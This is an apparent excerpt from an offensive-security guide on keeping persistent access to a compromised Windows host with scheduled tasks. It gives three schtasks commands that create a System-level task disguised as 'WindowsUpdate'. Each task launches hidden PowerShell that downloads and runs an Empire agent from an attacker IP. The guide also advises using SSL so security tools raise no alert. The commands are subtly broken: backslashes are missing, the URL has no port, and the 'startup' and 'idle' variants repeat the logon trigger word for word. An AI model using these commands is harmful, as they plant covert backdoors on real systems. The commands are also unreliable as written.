The Windows Task Scheduler (schtasks) was introduced as a replacement to at.exe in Windows XP and 2003. However, we can still see at.exe running in the latest version of Windows for backward compatibility. In this section, we will use scheduled tasks to maintain persistent access to a compromised system.

Attackers can create a scheduled task on the compromised system to run the Empire agent payload from the attacker's machine, and then provide backdoor access. schtasks can be scheduled directly from the Command Prompt, as shown in the following screenshot:

The following are the typical scheduled tasks scenarios that can be engaged by attackers to maintain persistent access to the system:

• To launch a Empire Powershell agent during the user login process. Run the following command from the command line:

schtasks /create /tn WindowsUpdate /tr "c:windowssystem32powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:/agent.ps1'))'" /sc onlogon /ru System

• Similarly, to launch the agent on system start, run the following:

schtasks /create /tn WindowsUPdate /tr "c:windowssystem32powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:/agent.ps1'))'" /sc onlogon /ru System

• The following command will to set up to launch an agent when system gets into idle:

schtasks /create /tn WindowsUPdate /tr "c:windowssystem32powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:/agent.ps1'))'" /sc onlogon /ru System

Attackers will ensure that the listener is always running and open for connection. To legitimize it on the network, the server would need to be set up with a valid SSL certificate running HTTPS, in order not to trigger alerts in the internal security features (the firewall, IPS, or proxy).

The same task can be performed by a single command using the Empire PowerShell tools module persistence/evelated/schtasks*, as shown in the following screenshot: